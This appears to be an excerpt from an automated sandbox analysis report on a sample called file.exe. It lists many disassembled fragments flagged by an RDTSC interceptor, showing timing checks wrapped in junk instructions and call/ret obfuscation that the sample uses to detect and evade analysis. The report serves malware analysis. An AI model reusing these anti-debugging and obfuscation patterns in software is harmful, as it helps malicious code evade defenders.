                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276D7E second address: 1276D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5A01 second address: 12A5A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5A07 second address: 12A5A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A612D second address: 12A6143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jl 00007F8ED0E3C3D6h 0x0000000f jno 00007F8ED0E3C3D6h 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A8705 second address: 12A870A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A870A second address: 12A872F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0E3C3EDh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A872F second address: 12A8733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AC746 second address: 12AC74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AC840 second address: 12AC846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127524C second address: 1275282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F8ED0E3C3D6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007F8ED0E3C3E2h 0x00000013 jmp 00007F8ED0E3C3E4h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B1E27 second address: 12B1E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B1E2B second address: 12B1E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B1E31 second address: 12B1E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8ED0C920DBh 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007F8ED0C920D8h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B1E72 second address: 12B1E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B1E76 second address: 12B1E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B1FFE second address: 12B2002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B2002 second address: 12B2016 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F8ED0C920CEh 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B2892 second address: 12B2898 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B2898 second address: 12B28B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B3F62 second address: 12B3FE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007F8ED0E3C405h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 je 00007F8ED0E3C3E8h 0x0000001a jmp 00007F8ED0E3C3E2h 0x0000001f jmp 00007F8ED0E3C3E1h 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F8ED0E3C3DEh 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B3FE2 second address: 12B3FEC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B4353 second address: 12B4358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B4553 second address: 12B455D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8ED0C920CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B4AC8 second address: 12B4AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c mov edi, 22159214h 0x00000011 nop 0x00000012 jc 00007F8ED0E3C3DAh 0x00000018 push eax 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B4D93 second address: 12B4D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B4D97 second address: 12B4D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B50C7 second address: 12B50D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B5F3A second address: 12B5F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B5F3E second address: 12B5F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B8727 second address: 12B8739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8ED0E3C3DEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B8739 second address: 12B879D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F8ED0C920C8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov esi, ecx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F8ED0C920C8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 movsx esi, cx 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jnl 00007F8ED0C920C6h 0x00000050 ja 00007F8ED0C920C6h 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B879D second address: 12B87A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B7A4A second address: 12B7A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B87A3 second address: 12B87A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B7A50 second address: 12B7A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B87A7 second address: 12B87C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8ED0E3C3E5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B917E second address: 12B9193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B9B06 second address: 12B9B10 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0E3C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B9B10 second address: 12B9B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BC2B6 second address: 12BC2D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E5h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BC2D8 second address: 12BC2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BC2DE second address: 12BC2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BC2E2 second address: 12BC2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BC2E6 second address: 12BC2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F8ED0E3C3D6h 0x0000000f jnc 00007F8ED0E3C3D6h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BC2FC second address: 12BC313 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8ED0C920D2h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BC313 second address: 12BC319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1269572 second address: 1269576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1269576 second address: 126958B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126958B second address: 12695AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0C920CCh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8ED0C920CBh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12695AD second address: 12695B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C08A0 second address: 12C08A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1856 second address: 12C185A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C185A second address: 12C185E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C09FD second address: 12C0A7D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0E3C3DEh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pop ebx 0x00000015 nop 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 xor bl, 00000034h 0x00000027 mov eax, dword ptr [ebp+122D0F39h] 0x0000002d push eax 0x0000002e jbe 00007F8ED0E3C3DCh 0x00000034 add ebx, dword ptr [ebp+12461B72h] 0x0000003a pop ebx 0x0000003b push FFFFFFFFh 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F8ED0E3C3D8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000018h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 mov edi, ebx 0x00000059 nop 0x0000005a jng 00007F8ED0E3C3ECh 0x00000060 pushad 0x00000061 jmp 00007F8ED0E3C3DEh 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C185E second address: 12C1864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1864 second address: 12C18E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F8ED0E3C3D8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D1B98h] 0x0000002d movzx edi, si 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F8ED0E3C3D8h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov dword ptr [ebp+12461300h], ecx 0x00000052 push 00000000h 0x00000054 mov bx, 5239h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F8ED0E3C3E6h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C283C second address: 12C2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edx 0x00000009 call 00007F8ED0C920C8h 0x0000000e pop edx 0x0000000f mov dword ptr [esp+04h], edx 0x00000013 add dword ptr [esp+04h], 0000001Dh 0x0000001b inc edx 0x0000001c push edx 0x0000001d ret 0x0000001e pop edx 0x0000001f ret 0x00000020 cmc 0x00000021 push 00000000h 0x00000023 stc 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+122D2D29h], ecx 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1B27 second address: 12C1B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8ED0E3C3E5h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1B4A second address: 12C1B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C29C1 second address: 12C29C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C3B26 second address: 12C3B35 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C29C5 second address: 12C29CF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8ED0E3C3DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C46DF second address: 12C46E9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3B35 second address: 12C3B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C29CF second address: 12C29DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C46E9 second address: 12C46EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3B39 second address: 12C3B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C46EF second address: 12C46F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C29DB second address: 12C29DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3B3D second address: 12C3B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C46F3 second address: 12C4783 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F8ED0C920CAh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F8ED0C920C8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d push eax 0x0000002e add dword ptr [ebp+122D1834h], esi 0x00000034 pop edi 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D1834h], eax 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007F8ED0C920C8h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F8ED0C920D8h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C29DF second address: 12C2A6D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 and edi, 01E36214h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jnl 00007F8ED0E3C3D9h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jnl 00007F8ED0E3C3DBh 0x00000028 mov eax, dword ptr [ebp+122D0109h] 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F8ED0E3C3D8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007F8ED0E3C3D8h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 00000019h 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 mov edi, dword ptr [ebp+122D354Bh] 0x0000006a mov bl, 40h 0x0000006c push eax 0x0000006d push edi 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F8ED0E3C3DAh 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4783 second address: 12C4789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4987 second address: 12C498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C498B second address: 12C4995 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4995 second address: 12C499A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C5875 second address: 12C587B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C5A76 second address: 12C5A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F8ED0E3C3D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C98D9 second address: 12C98DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C98DD second address: 12C98EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnp 00007F8ED0E3C3D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C98EC second address: 12C98F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F8ED0C920C6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9EA7 second address: 12C9EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9EAC second address: 12C9EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9EB2 second address: 12C9EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F8ED0E3C3D6h 0x00000012 rdtsc
